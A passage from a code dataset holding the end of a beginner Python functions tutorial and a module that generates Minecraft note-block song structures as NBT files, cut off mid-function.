no argument is given.\r\n\r\n\r\ndef checkDriverAge(age =0):\r\n if int(age) < 18:\r\n print(\"Sorry, you are too young to drive this car. Powering off\")\r\n elif int(age) > 18:\r\n print(\"Powering On. Enjoy the ride!\")\r\n elif int(age) == 18:\r\n print(\"Congratulations on your first year of driving. 
Enjoy the ride!\")\r\n\r\nprint(checkDriverAge(92))\r\n\r\n\r\n#Methods Vs Functions\r\n\r\n#docstrings\r\n\r\ndef test_a(a):\r\n '''\r\n This function describes about the parameter a\r\n\r\n '''\r\n return a\r\n\r\nprint(test_a('((((ppp)))'))\r\n\r\n#*args, **kwargs\r\n\r\ndef super_func(*args, **kwargs):\r\n print(args)\r\n total = 0\r\n for i in kwargs.values():\r\n total += i\r\n\r\n return sum(args) + total\r\n\r\nprint(super_func(1,2,3,45,55, num=11, num2 = 77))\r\n\r\n\r\n\r\ndef highest_even(li):\r\n li = sorted(li)\r\n lst = []\r\n for i in li:\r\n if i%2 == 0:\r\n lst.append(i)\r\n return (lst)[-1]\r\n\r\n\r\nprint(highest_even([10000,13,-19,30,100]))\r\n\r\n\r\n#Walrus Operator :=\r\n\r\n#Scope - What variables do I have access to ?\r\n#who has access to who?\r\n\r\n\r\n#Global keyword\r\n#nonlocal keyword\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"vigneshSs-07/Complete-AtoZ-PythonProgramming","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29697172600","text":"import block_settings as blocks\nfrom nbt_structure_utils import (\n BlockData,\n Cuboid,\n Inventory,\n ItemStack,\n NBTStructure,\n Vector,\n)\nfrom process_song import Channel, TickChannels\n\nMAX_NOTES_IN_CHANNEL = 10\n\n\ndef generate_wall_song_nbt_structure(\n instruments: list[blocks.InstrumentBlock],\n channels: list[Channel],\n tickchannels: list[TickChannels],\n max_height: int = 384,\n) -> NBTStructure:\n channel_count_1, channel_count_2 = determine_channel_counts(len(channels))\n ordered_channels = reorder_channels(channels)\n channels1 = ordered_channels[0:channel_count_1]\n channels2 = ordered_channels[channel_count_1:] if channel_count_2 > 0 else []\n\n # build layer by layer and structure by structure.\n structure1 = build_sequencer(instruments, channels1, tickchannels, True, max_height)\n place_starter(structure1)\n # listening zone\n curr_vol = Cuboid(Vector(0, 1, -1), Vector(6, 1, -3))\n structure1.fill_keep(curr_vol, blocks.floor_building)\n structure1.set_block(Vector(3, 1, -2), blocks.light_source)\n\n # if we needed the space, generate a 2nd one and place behind player listening spot.\n if any(channels2):\n offset = Vector(0, 0, -3 - len(channels2))\n structure2 = build_sequencer(\n instruments, channels2, tickchannels, False, max_height\n )\n structure1.clone_structure(structure2, offset)\n\n return structure1\n\n\ndef determine_channel_counts(total_channels: int) -> tuple[int, int]:\n max_channels_per_side = 30\n channel_count_1 = total_channels\n channel_count_2 = 0\n if channel_count_1 > max_channels_per_side * 2:\n raise ValueError(\n \"Max channel count is %i but %i were parsed from song.\"\n % (max_channels_per_side * 2, channel_count_1)\n )\n if channel_count_1 > max_channels_per_side:\n channel_count_2 = channel_count_1 // 2\n channel_count_1 -= channel_count_2\n return channel_count_1, channel_count_2\n\n\ndef reorder_channels(channels: list[Channel]) -> list[Channel]:\n working_channels = sorted(channels, key=len)\n ordered_channels = []\n while any(working_channels):\n ordered_channels.append(working_channels.pop(0))\n if any(working_channels):\n ordered_channels.append(working_channels.pop())\n return ordered_channels\n\n\ndef build_sequencer(\n instruments: list[blocks.InstrumentBlock],\n channels: list[Channel],\n tickchannels: TickChannels,\n is_south_half: bool,\n max_height: int,\n) -> NBTStructure:\n structure = 
NBTStructure()\n build_base(structure, instruments, channels, is_south_half)\n encode_song(structure, channels, tickchannels, is_south_half, max_height)\n\n return structure\n\n\ndef build_base(\n structure: NBTStructure,\n instruments: list[blocks.InstrumentBlock],\n channels: list[Channel],\n is_south_half: bool,\n) -> None:\n \"\"\"build section from bottom up to just before note encoding\"\"\"\n # layers 0 - 4 without note blocks. align 1st channel's walls with 0,y,0\n max_z = len(channels) - 1\n curr_block = blocks.redstone_solid_support\n curr_vol = Cuboid(Vector(2, 0, 0), Vector(6, 0, max_z))\n structure.fill(curr_vol, curr_block)\n curr_vol = Cuboid(Vector(0, 2, 0), Vector(0, 2, max_z))\n structure.fill(curr_vol, curr_block)\n curr_vol = Cuboid(Vector(6, 2, 0), Vector(6, 2, max_z))\n structure.fill(curr_vol, curr_block)\n\n for z in range(0, max_z + 1):\n curr_block = (\n blocks.get_powered_rail(\"east_west\") if z % 2 == 0 else blocks.redstone_wire\n )\n curr_vol = Cuboid(Vector(2, 1, z), Vector(6, 1, z))\n structure.fill(curr_vol, curr_block)\n structure.set_block(Vector(0, 3, z), curr_block)\n\n curr_vol = Cuboid(Vector(2, 2, 0), Vector(2, 2, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"down\"))\n curr_vol = Cuboid(Vector(1, 3, 0), Vector(1, 3, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"west\"))\n curr_vol = Cuboid(Vector(0, 4, 0), Vector(0, 4, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"up\"))\n curr_vol = Cuboid(Vector(6, 3, 0), Vector(6, 4, max_z))\n structure.fill(curr_vol, blocks.get_observer(\"up\"))\n\n # fill in note blocks and floor around them\n for z, channel in enumerate(channels):\n build_chord(structure, instruments, channel, z)\n curr_vol = Cuboid(Vector(3, 2, 0), Vector(5, 2, max_z))\n structure.fill_keep(curr_vol, blocks.floor_building)\n\n bus_to_torch_towers(structure, max_z, is_south_half)\n\n\ndef build_chord(\n structure: NBTStructure,\n instruments: list[blocks.InstrumentBlock],\n channel: Channel,\n z: int,\n) -> None:\n if len(channel) > MAX_NOTES_IN_CHANNEL:\n raise ValueError(\n \"Can only support %i gravity blocks in a chord.\" % (MAX_NOTES_IN_CHANNEL)\n )\n\n instrument_blocks = [\n next(\n instr.copy_with_key(note.key)\n for instr in instruments\n if instr.id == note.block_id\n )\n for note in channel\n ]\n\n # sort list to have a solid block first\n instrument_blocks.sort(key=lambda n: (not n.transmits_redstone, n.id, n.key))\n chord_built = build_small_chord(structure, instrument_blocks, z)\n if not chord_built:\n build_big_chord(structure, instrument_blocks, z)\n\n\ndef build_big_chord(\n structure: NBTStructure, instrument_blocks: list[blocks.InstrumentBlock], z: int\n) -> None:\n skip_4th_block = fix_4th_block(instrument_blocks)\n structure.set_block(Vector(2, 3, z), blocks.redstone_solid_support)\n\n vertical_bus = get_vertical_wire_segment()\n\n structure.set_block(Vector(2, 4, z), blocks.redstone_wire_connecting)\n structure.set_block(Vector(3, 2, z), blocks.redstone_bus_trans)\n structure.set_block(Vector(3, 3, z), blocks.redstone_wire_connecting)\n # 1st\n place_instrument(structure, Vector(4, 3, z), instrument_blocks.pop(0))\n # 2nd\n place_instrument(structure, Vector(5, 3, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n structure.clone_structure(vertical_bus, Vector(1, 4, z))\n # 3rd\n place_instrument(structure, Vector(3, 6, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 4th\n if skip_4th_block is False:\n place_instrument(structure, Vector(4, 
6, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # double bus's vertical distance\n vertical_bus.clone_structure(vertical_bus, Vector(0, 2, 0))\n structure.clone_structure(vertical_bus, Vector(1, 6, z))\n # 5th\n place_instrument(structure, Vector(3, 10, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 6th\n place_instrument(structure, Vector(4, 10, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n structure.clone_structure(vertical_bus, Vector(1, 10, z))\n # 7th\n place_instrument(structure, Vector(3, 14, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 8th\n place_instrument(structure, Vector(4, 14, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n structure.clone_structure(vertical_bus, Vector(1, 14, z))\n # 9th\n place_instrument(structure, Vector(3, 18, z), instrument_blocks.pop(0))\n if not any(instrument_blocks):\n return\n # 10th\n place_instrument(structure, Vector(4, 18, z), instrument_blocks.pop(0))\n\n\ndef place_instrument(\n nbt_s: NBTStructure,\n note_block_pos: Vector,\n block_info: blocks.InstrumentBlock,\n) -> None:\n if block_info is not None:\n curr_pos = note_block_pos.copy()\n curr_pos.y += 1\n nbt_s.set_block(curr_pos, blocks.air)\n curr_pos.y -= 1\n nbt_s.set_block(curr_pos, block_info.get_note_block())\n curr_pos.y -= 1\n nbt_s.set_block(curr_pos, block_info.block_data)\n curr_pos.y -= 1\n if block_info.gravity and nbt_s.get_block_state(curr_pos) is None:\n nbt_s.set_block(curr_pos, blocks.redstone_bus_trans)\n\n\ndef build_small_chord(\n structure: NBTStructure, instrument_blocks: list[blocks.InstrumentBlock], z: int\n) -> bool:\n \"\"\"Build all 1 note and some 2 note chords. Return True if chord was built\"\"\"\n if len(instrument_blocks) <= 2 and any(\n b for b in instrument_blocks if b.transmits_redstone\n ):\n place_instrument(structure, Vector(2, 4, z), instrument_blocks.pop(0))\n if any(instrument_blocks):\n place_instrument(structure, Vector(3, 3, z), instrument_blocks.pop(0))\n return True\n elif len(instrument_blocks) == 1:\n structure.set_block(Vector(2, 3, z), blocks.redstone_solid_support)\n place_instrument(structure, Vector(3, 3, z), instrument_blocks.pop(0))\n return True\n return False\n\n\ndef get_vertical_wire_segment() -> NBTStructure:\n vertical_bus = NBTStructure()\n vertical_bus.set_block(Vector(0, 0, 0), blocks.redstone_bus_trans)\n vertical_bus.set_block(Vector(0, 1, 0), blocks.redstone_wire_connecting)\n vertical_bus.set_block(Vector(1, 1, 0), blocks.redstone_bus_trans)\n vertical_bus.set_block(Vector(1, 2, 0), blocks.redstone_wire_connecting)\n return vertical_bus\n\n\ndef fix_4th_block(instrument_blocks: list[blocks.InstrumentBlock]) -> bool:\n \"\"\"Make sure 4th block is not a gravity block. 
Return true if no substitution could be made.\"\"\"\n skip_4th_block = False\n if len(instrument_blocks) >= 4 and instrument_blocks[3].gravity is True:\n index = next(\n (i for i, item in enumerate(instrument_blocks) if item.gravity is False), -1\n )\n if index == -1:\n skip_4th_block = True\n if len(instrument_blocks) > MAX_NOTES_IN_CHANNEL - 1:\n raise ValueError(\n \"Can only support %i gravity blocks in a chord.\"\n % (MAX_NOTES_IN_CHANNEL - 1)\n )\n else:\n instrument_blocks[index], instrument_blocks[3] = (\n instrument_blocks[3],\n instrument_blocks[index],\n )\n return skip_4th_block\n\n\ndef bus_to_torch_towers(\n structure: NBTStructure, max_z: int, is_south_half: bool\n) -> None:\n # bus signal to start of torch lines\n if max_z < 15:\n curr_vol = Cuboid(Vector(4, 19, -1), Vector(5, 19, -1))\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n curr_vol = Cuboid(Vector(4, 20, -1), Vector(5, 20, -1))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n else:\n # bus between torch towers\n curr_vol = Cuboid(Vector(5, 18, 0), Vector(5, 18, max_z))\n structure.fill(curr_vol, blocks.redstone_bus_trans)\n curr_vol = Cuboid(Vector(5, 19, 0), Vector(5, 19, max_z))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n dir = \"north\" if is_south_half else \"south\"\n z_pos = (max_z + 3) // 3\n structure.set_block(Vector(5, 19, z_pos), blocks.get_repeater(dir, 1))\n structure.set_block(Vector(5, 19, z_pos * 2), blocks.get_repeater(dir, 1))\n # start of torch lines\n curr_vol = Cuboid(Vector(4, 19, max_z + 1), Vector(5, 19, max_z + 1))\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n curr_vol = Cuboid(Vector(4, 20, max_z + 1), Vector(5, 20, max_z + 1))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n curr_vol = Cuboid(Vector(4, 19, -1), Vector(5, 19, -1))\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n curr_vol = Cuboid(Vector(4, 20, -1), Vector(5, 20, -1))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n if is_south_half:\n structure.set_block(Vector(4, 20, -1), blocks.get_repeater(\"east\", 2))\n else:\n structure.set_block(\n Vector(4, 20, max_z + 1), blocks.get_repeater(\"east\", 2)\n )\n structure.set_block(Vector(4, 20, max_z + 3), blocks.air)\n\n\ndef place_starter(structure: NBTStructure) -> None:\n starter = NBTStructure()\n starter.set_block(Vector(0, 0, 0), blocks.get_button(\"stone\", \"south\", \"ceiling\"))\n starter.set_block(Vector(0, 1, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 2, 0), blocks.get_redstone_torch(True, None))\n starter.set_block(Vector(0, 3, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 4, 0), blocks.get_redstone_torch(False, None))\n starter.set_block(Vector(0, 5, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 6, 0), blocks.get_redstone_torch(True, None))\n starter.set_block(Vector(0, 7, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 8, 0), blocks.get_redstone_torch(False, None))\n starter.set_block(Vector(0, 9, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 10, 0), blocks.get_redstone_torch(True, None))\n starter.set_block(Vector(0, 11, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(0, 12, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(-1, 11, 0), blocks.get_sticky_piston(\"up\"))\n starter.set_block(Vector(-1, 13, 0), blocks.get_observer(\"west\"))\n starter.set_block(Vector(1, 11, 0), blocks.redstone_bus_trans)\n starter.set_block(Vector(2, 11, 0), blocks.redstone_bus_trans)\n 
starter.set_block(Vector(1, 12, 0), blocks.get_repeater(\"west\", 2))\n starter.set_block(Vector(2, 12, 0), blocks.redstone_wire_connecting)\n\n starter.set_block(Vector(1, 8, 0), blocks.redstone_bus_start)\n starter.set_block(Vector(1, 9, 0), blocks.get_comparator(\"east\", \"compare\"))\n starter.set_block(Vector(2, 9, 0), blocks.get_dropper(\"up\"))\n inv = Inventory([ItemStack(\"minecraft:wooden_sword\", 1, 0, 0, [])])\n starter.set_block(Vector(2, 10, 0), blocks.get_dropper(\"down\"), inv)\n\n structure.clone_structure(starter, Vector(3, 7, -2))\n\n\ndef encode_song(\n structure: NBTStructure,\n channels: list[Channel],\n tickchannels: TickChannels,\n is_south_half: bool,\n max_height: int,\n) -> None:\n \"\"\"place pistons that will update walls\"\"\"\n channel_positions = get_channel_positions(channels)\n max_z = len(channels) - 1\n starting_height = 20\n repeating_blocks = get_piston_redstone_line(max_z, is_south_half)\n max_tick = max([t.tick for t in tickchannels])\n # fill middle section up to height, then add to sides to expand\n curr_tick = 0\n curr_y = starting_height\n while max_height >= (curr_y + 1) and max_tick >= curr_tick:\n structure.clone_structure(repeating_blocks, Vector(3, curr_y, 0))\n # on beat (even redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n structure,\n 2,\n curr_y, # yum\n tick.channels,\n channel_positions,\n blocks.get_piston(\"west\"),\n )\n curr_tick += 1\n # on eighth (odd redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n structure,\n 4,\n curr_y,\n tick.channels,\n channel_positions,\n blocks.get_piston(\"east\"),\n )\n curr_tick += 1\n curr_y += 2\n\n # add walls and blocks that go next to walls\n wall_structure = get_wall(max_z, curr_y - 1)\n structure.clone_structure(wall_structure, Vector(0, 0, 0))\n structure.clone_structure(wall_structure, Vector(6, 0, 0))\n\n if curr_tick > max_tick:\n if is_south_half:\n place_downward_line(\n structure,\n Vector(6, 17, -2),\n curr_y - 1,\n blocks.redstone_bus_reset,\n False,\n )\n structure.set_block(\n Vector(4, curr_y - 1, -2), blocks.get_redstone_torch(False, \"east\")\n )\n else:\n downward_line_max_y = curr_y - 5\n if is_south_half:\n place_downward_line(\n structure,\n Vector(0, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n True,\n )\n structure.set_block(\n Vector(4, downward_line_max_y, -2),\n blocks.get_redstone_torch(False, \"east\"),\n )\n place_downward_line(\n structure,\n Vector(6, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n False,\n )\n structure.set_block(\n Vector(2, downward_line_max_y, -2),\n blocks.get_redstone_torch(False, \"west\"),\n )\n extend_song(\n structure,\n curr_tick,\n max_tick,\n tickchannels,\n channel_positions,\n is_south_half,\n starting_height,\n max_height,\n downward_line_max_y - 4,\n max_z,\n repeating_blocks,\n -3,\n 9,\n )\n\n\n# max_z is for wall blacks only and does not include the solid edges\ndef get_wall(max_z, height) -> NBTStructure:\n temp_structure = NBTStructure()\n curr_volume = Cuboid(Vector(0, 5, -1), Vector(0, height, -1))\n temp_structure.fill(curr_volume, blocks.neutral_building)\n curr_volume = Cuboid(Vector(0, 5, max_z), Vector(0, height, max_z + 1))\n temp_structure.fill(curr_volume, blocks.neutral_building)\n curr_volume = Cuboid(Vector(0, 5, 0), Vector(0, height - 1, max_z))\n temp_structure.fill(curr_volume, 
blocks.get_flat_wall(is_top=False, dir=\"north\"))\n curr_volume = Cuboid(Vector(0, height, 0), Vector(0, height, max_z))\n temp_structure.fill(curr_volume, blocks.get_flat_wall(is_top=True, dir=\"north\"))\n return temp_structure\n\n\ndef get_bottom_extender_east(max_z: int) -> NBTStructure:\n temp_structure = NBTStructure()\n curr_vol = Cuboid(Vector(0, 0, 0), Vector(4, 0, max_z))\n temp_structure.fill(curr_vol, blocks.redstone_solid_support)\n curr_vol = Cuboid(Vector(0, 1, 0), Vector(2, 1, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"east\"))\n curr_vol = Cuboid(Vector(4, 2, 0), Vector(4, 2, max_z))\n temp_structure.fill(curr_vol, blocks.redstone_solid_support)\n curr_vol = Cuboid(Vector(4, 3, 0), Vector(4, 4, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"up\"))\n for z in range(0, max_z + 1):\n curr_block = (\n blocks.get_powered_rail(\"east_west\") if z % 2 == 0 else blocks.redstone_wire\n )\n curr_vol = Cuboid(Vector(2, 1, z), Vector(4, 1, z))\n temp_structure.fill(curr_vol, curr_block)\n return temp_structure\n\n\ndef get_bottom_extender_west(max_z: int) -> NBTStructure:\n temp_structure = NBTStructure()\n curr_vol = Cuboid(Vector(0, 0, 0), Vector(4, 0, max_z))\n temp_structure.fill(curr_vol, blocks.redstone_solid_support)\n curr_vol = Cuboid(Vector(3, 1, 0), Vector(4, 1, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"west\"))\n curr_vol = Cuboid(Vector(0, 2, 0), Vector(0, 2, max_z))\n temp_structure.fill(curr_vol, blocks.get_observer(\"up\"))\n for z in range(0, max_z + 1):\n curr_block = (\n blocks.get_powered_rail(\"east_west\") if z % 2 == 0 else blocks.redstone_wire\n )\n curr_vol = Cuboid(Vector(0, 1, z), Vector(2, 1, z))\n temp_structure.fill(curr_vol, curr_block)\n return temp_structure\n\n\ndef extend_song(\n structure: NBTStructure,\n curr_tick: int,\n max_tick: int,\n tickchannels: TickChannels,\n channel_positions: dict[int, int],\n is_south_half: bool,\n starting_height: int,\n max_height: int,\n downward_line_max_y: int,\n max_channel_z: int,\n repeating_blocks: NBTStructure,\n x_west_center: int,\n x_east_center: int,\n) -> None:\n west_wing = NBTStructure() # on beat, even tick\n east_wing = NBTStructure() # off beat, odd tick\n\n curr_y = starting_height\n while max_height >= (curr_y + 1) and max_tick >= curr_tick:\n west_wing.clone_structure(repeating_blocks, Vector(0, curr_y, 0))\n east_wing.clone_structure(repeating_blocks, Vector(0, curr_y, 0))\n # on beat (even redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n west_wing,\n 1,\n curr_y,\n tick.channels,\n channel_positions,\n blocks.get_piston(\"east\"),\n )\n curr_tick += 1\n # on eighth (odd redstone tick)\n tick = next((item for item in tickchannels if item.tick == curr_tick), None)\n if tick is not None:\n place_pistons(\n east_wing,\n -1,\n curr_y,\n tick.channels,\n channel_positions,\n blocks.get_piston(\"west\"),\n )\n curr_tick += 1\n curr_y += 2\n bus_to_torch_towers_extended(\n west_wing, 2, starting_height, max_channel_z, is_south_half, False\n )\n bus_to_torch_towers_extended(\n east_wing, -2, starting_height, max_channel_z, is_south_half, True\n )\n\n structure.clone_structure(west_wing, Vector(x_west_center, 0, 0))\n structure.clone_structure(east_wing, Vector(x_east_center, 0, 0))\n\n if curr_tick > max_tick:\n if is_south_half:\n # place observer wire down to reset line\n y_top = ((curr_y - 20) // 2) + 20\n if y_top % 2 == 1:\n y_top -= 1\n pos_top = 
Vector(x_east_center - 1, y_top, -2)\n pos_bot = Vector(x_east_center - 1, 17, -2)\n structure.fill(Cuboid(pos_top, pos_bot), blocks.get_observer(facing=\"up\"))\n pos_top.y += 1\n structure.set_block(pos_top, blocks.get_redstone_torch(False, \"west\"))\n pos_bot.y -= 1\n structure.set_block(pos_bot, blocks.redstone_bus_reset)\n pos_bot.x -= 1\n structure.set_block(pos_bot, blocks.redstone_wire_connecting)\n pos_bot.x -= 1\n structure.set_block(pos_bot, blocks.redstone_wire_connecting)\n pos_bot.y -= 1\n structure.set_block(pos_bot, blocks.redstone_bus_reset)\n pos_bot.x += 1\n structure.set_block(pos_bot, blocks.redstone_bus_reset)\n else:\n if is_south_half:\n # east\n place_downward_line(\n structure,\n Vector(x_east_center + 2, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n True,\n )\n curr_pos = Vector(x_east_center, downward_line_max_y, -3)\n final_pos = Vector(x_east_center + 3, downward_line_max_y + 1, -3)\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n structure.set_block(curr_pos, blocks.get_redstone_torch(\"north\", True))\n curr_pos.y += 1\n curr_pos.x += 1\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n structure.set_block(curr_pos, blocks.get_repeater(\"west\", 2))\n # reset line below\n pos1 = Vector(x_east_center - 3, 16, -2)\n pos2 = Vector(x_east_center + 1, 15, -2)\n structure.fill(Cuboid(pos1, pos2), blocks.redstone_bus_reset)\n pos1.x += 1\n pos2.y += 1\n structure.fill(Cuboid(pos1, pos2), blocks.redstone_wire_connecting)\n structure.set_block(pos1, blocks.get_repeater(\"east\", 1))\n\n # west\n place_downward_line(\n structure,\n Vector(x_west_center - 2, 21, -2),\n downward_line_max_y,\n blocks.redstone_bus_torch,\n False,\n )\n curr_pos = Vector(x_west_center, downward_line_max_y, -3)\n final_pos = Vector(x_west_center - 3, downward_line_max_y + 1, -3)\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_bus_torch)\n structure.set_block(curr_pos, blocks.get_redstone_torch(\"north\", True))\n curr_pos.y += 1\n curr_pos.x -= 1\n curr_vol = Cuboid(curr_pos, final_pos)\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n structure.set_block(curr_pos, blocks.get_repeater(\"east\", 2))\n\n # place next wall + bussings\n wall_structure = get_wall(max_channel_z, curr_y - 1)\n structure.clone_structure(wall_structure, Vector(x_west_center - 2, 0, 0))\n structure.clone_structure(wall_structure, Vector(x_east_center + 2, 0, 0))\n east_bussing = get_bottom_extender_east(max_channel_z)\n structure.clone_structure(east_bussing, Vector(x_east_center - 2, 0, 0))\n west_bussing = get_bottom_extender_west(max_channel_z)\n structure.clone_structure(west_bussing, Vector(x_west_center - 2, 2, 0))\n\n # extend\n extend_song(\n structure,\n curr_tick,\n max_tick,\n tickchannels,\n channel_positions,\n is_south_half,\n starting_height,\n max_height,\n downward_line_max_y,\n max_channel_z,\n repeating_blocks,\n x_west_center - 5,\n x_east_center + 5,\n )\n\n\ndef bus_to_torch_towers_extended(\n structure: NBTStructure,\n x: int,\n y: int,\n max_z: int,\n is_south_half: bool,\n is_east_half: bool,\n) -> None:\n # bus signal to start of torch lines\n\n if max_z < 15:\n structure.set_block(Vector(x, y - 1, -2), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -2), blocks.redstone_wire_connecting)\n structure.set_block(Vector(x, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -1), 
blocks.redstone_wire_connecting)\n if is_east_half:\n structure.set_block(Vector(x + 1, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x + 1, y, -1), blocks.get_repeater(\"west\", 2))\n structure.set_block(Vector(x - 1, y + 2, -2), blocks.get_observer(\"up\"))\n else:\n structure.set_block(Vector(x - 1, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x - 1, y, -1), blocks.get_repeater(\"east\", 2))\n structure.set_block(Vector(x + 1, y + 2, -2), blocks.get_observer(\"up\"))\n else:\n structure.set_block(Vector(x, y - 1, -1), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -1), blocks.redstone_wire_connecting)\n # bus between torch towers\n curr_vol = Cuboid(Vector(x, y - 2, 0), Vector(x, y - 2, max_z))\n structure.fill(curr_vol, blocks.redstone_bus_trans)\n curr_vol = Cuboid(Vector(x, y - 1, 0), Vector(x, y - 1, max_z))\n structure.fill(curr_vol, blocks.redstone_wire_connecting)\n dir = \"north\" if is_south_half else \"south\"\n z_pos = (max_z + 3) // 3\n structure.set_block(Vector(x, y - 1, z_pos), blocks.get_repeater(dir, 1))\n structure.set_block(Vector(x, y - 1, z_pos * 2), blocks.get_repeater(dir, 1))\n # start of torch lines\n if is_south_half:\n structure.set_block(Vector(x, y - 1, -2), blocks.redstone_bus_torch)\n structure.set_block(Vector(x, y, -2), blocks.redstone_wire_connecting)\n if is_east_half:\n structure.set_block(Vector(x + 1, y - 1, -1), blocks.redstone_bus_torch)\n if is_south_half:\n structure.set_block(\n Vector(x + 1, y, -1), blocks.get_repeater(\"west\", 2)\n )\n structure.set_block(Vector(x, y + 1, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x - 1, y + 2, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x, y + 2, -2), blocks.get_observer(\"west\"))\n else:\n structure.set_block(\n Vector(x + 1, y, -1), blocks.redstone_wire_connecting\n )\n curr_pos = Vector(x + 1, y - 1, max_z + 1)\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.x -= 1\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.y += 1\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n curr_pos.x += 1\n if is_south_half:\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n else:\n structure.set_block(curr_pos, blocks.get_repeater(\"west\", 2))\n structure.set_block(Vector(x + 1, y, max_z + 3), blocks.air)\n else:\n structure.set_block(Vector(x - 1, y - 1, -1), blocks.redstone_bus_torch)\n if is_south_half:\n structure.set_block(\n Vector(x - 1, y, -1), blocks.get_repeater(\"east\", 2)\n )\n structure.set_block(Vector(x, y + 1, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x + 1, y + 2, -2), blocks.get_observer(\"up\"))\n structure.set_block(Vector(x, y + 2, -2), blocks.get_observer(\"east\"))\n else:\n structure.set_block(\n Vector(x - 1, y, -1), blocks.redstone_wire_connecting\n )\n curr_pos = Vector(x - 1, y - 1, max_z + 1)\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.x += 1\n structure.set_block(curr_pos, blocks.redstone_bus_torch)\n curr_pos.y += 1\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n curr_pos.x -= 1\n if is_south_half:\n structure.set_block(curr_pos, blocks.redstone_wire_connecting)\n else:\n structure.set_block(curr_pos, blocks.get_repeater(\"east\", 2))\n structure.set_block(Vector(x - 1, y, max_z + 3), blocks.air)\n\n\n# goal: create list so we can input channel id as index, get back block's z\ndef get_channel_positions(channels: list[Channel]) -> dict[int, int]:\n 
channel_positions: dict[int, int] = {}\n for i in range(max(channel.id for channel in channels) + 1):\n pos = next((j for j, chan in enumerate(channels) if chan.id == i), None)\n channel_positions[i] = pos\n return channel_positions\n\n\ndef place_pistons(\n structure: NBTStructure,\n x: int,\n y: int,\n channels_to_place: list[int],\n channel_pos: dict,\n block: BlockData,\n) -> None:\n for chan_id in channels_to_place:\n if channel_pos.get(chan_id, None) is not None:\n structure.set_block(Vector(x, y, channel_pos[chan_id]), block)\n\n\ndef get_piston_redstone_line(max_z: int, is_south_half: bool) -> NBTStructure:\n # main line\n p_structure = NBTStructure()\n curr_vol = Cuboid(Vector(0, 0, 0), Vector(0, 0, max_z))\n p_structure.fill(curr_vol, blocks.redstone_bus_main)\n curr_vol = Cuboid(Vector(0, 1, 0), Vector(0, 1, max_z))\n p_structure.fill(curr_vol, blocks.redstone_wire_connecting)\n # torch towers\n if is_south_half or max_z >= 15:\n p_structure.set_block(Vector(0, 0, -1), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 0, -2), blocks.get_redstone_torch(True, \"north\")\n )\n p_structure.set_block(Vector(0, 1, -2), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 1, -1), blocks.get_redstone_torch(False, \"south\")\n )\n if not is_south_half or max_z >= 15:\n p_structure.set_block(Vector(0, 0, max_z + 1), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 0, max_z + 2), blocks.get_redstone_torch(True, \"south\")\n )\n p_structure.set_block(Vector(0, 1, max_z + 2), blocks.redstone_bus_torch)\n p_structure.set_block(\n Vector(0, 1, max_z + 1), blocks.get_redstone_torch(False, \"north\")\n )\n return p_structure\n\n\ndef place_downward_line(\n structure: 